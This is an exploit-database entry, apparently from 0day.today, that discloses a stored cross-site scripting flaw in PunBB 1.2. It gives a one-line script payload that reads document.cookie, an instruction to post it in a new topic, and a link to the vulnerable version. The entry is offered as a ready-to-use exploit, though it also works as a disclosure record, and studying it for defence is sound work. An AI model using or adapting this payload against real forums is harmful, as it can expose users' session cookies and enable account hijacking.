PunBB 1.2 XSS Vulnerability

2010-04-09T00:00:00
ID 1337DAY-ID-11699
Type zdt
Reporter The_Exploited
Modified 2010-04-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================
PunBB 1.2 XSS Vulnerability
===========================


@Title: PunBB 1.2 XSS Vulnerability

@Author: The_Exploited aka l3d aka Spoof

@Mail: [email protected]

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/

@Exploit: "><script>alert(document.cookie);</script>

@Demo: You have to put the Exploit in your "New topic" - The HTML is ON

@CMS Download: http://punbb.informer.com/download/museum/punbb-1.2.zip

@CMS Version: 1.2

@Date: 2010-04-09



#  0day.today [2018-03-19]  #